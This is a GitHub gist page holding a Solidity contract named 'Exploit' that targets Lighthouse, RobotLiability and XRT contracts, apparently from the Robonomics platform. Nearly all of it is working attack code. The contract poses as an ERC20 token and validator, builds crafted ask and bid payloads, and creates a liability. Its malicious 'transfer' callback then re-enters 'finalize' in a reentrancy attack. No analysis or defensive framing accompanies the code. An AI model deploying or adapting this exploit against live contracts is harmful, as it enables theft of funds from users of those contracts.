Created
September 21, 2018 11:13
-
-
Save Raz0r/fc6994dffb2801cdf4d355cd02f5959b to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import './Lighthouse.sol'; | |
| import './RobotLiability.sol'; | |
| import './XRT.sol'; | |
| contract Exploit { | |
| event Log ( | |
| string _log | |
| ); | |
| Lighthouse public lighthouse; | |
| XRT public xrt; | |
| bool public called; | |
| constructor(Lighthouse _lighthouse, XRT _xrt) { | |
| lighthouse = _lighthouse; | |
| xrt = _xrt; | |
| } | |
| function reentrancy() returns(bool) { | |
| bytes memory model = hex"41414141"; | |
| bytes memory objective = hex"41414141"; | |
| bytes memory signature = hex"00"; | |
| bytes memory ask = abi.encode( | |
| model, // bytes _model | |
| objective, // bytes _objective | |
| address(this), // ERC20 _token, | |
| uint256(0), // uint256 _cost, | |
| address(this), // address _validator, | |
| uint256(0), // uint256 _validator_fee, | |
| block.number + 1, // uint256 _deadline, | |
| bytes32(0), // bytes32 _nonce, | |
| signature // bytes _signature | |
| ); | |
| bytes memory bid = abi.encode( | |
| model, // bytes _model, | |
| objective, // bytes _objective, | |
| address(this), // ERC20 _token, | |
| uint256(0), // uint256 _cost, | |
| uint256(0), // uint256 _lighthouse_fee, | |
| block.number + 1, // uint256 _deadline, | |
| bytes32(0), // bytes32 _nonce, | |
| signature // bytes _signature | |
| ); | |
| // 1. approve lighthouse to spend 1 wn | |
| xrt.approve(address(lighthouse), 1); | |
| // 2. refill lighthouse | |
| bytes memory calldata = abi.encodePacked(bytes4(0xca9d07ba), uint256(1)); | |
| lighthouse.call(calldata); | |
| // 3. create liability | |
| lighthouse.call(abi.encodeWithSelector(bytes4(0xd2b962f2), ask, bid)); | |
| } | |
| function finalize(RobotLiability liability) returns (bool){ | |
| return liability.call(abi.encodeWithSignature("finalize(bytes,bytes,bool)", hex"41414141", hex"00", true)); | |
| } | |
| function transferFrom(address a, address b, uint256 c) returns (bool) { | |
| emit Log("transferFrom REENTRANCY"); | |
| return true; | |
| } | |
| function transfer(address a, uint256 c) returns (bool) { | |
| if(!called) { | |
| called=true; | |
| msg.sender.call(abi.encodeWithSignature("finalize(bytes,bytes,bool)", hex"41414141", hex"00", true)); | |
| } | |
| emit Log("transfer REENTRANCY"); | |
| return true; | |
| } | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment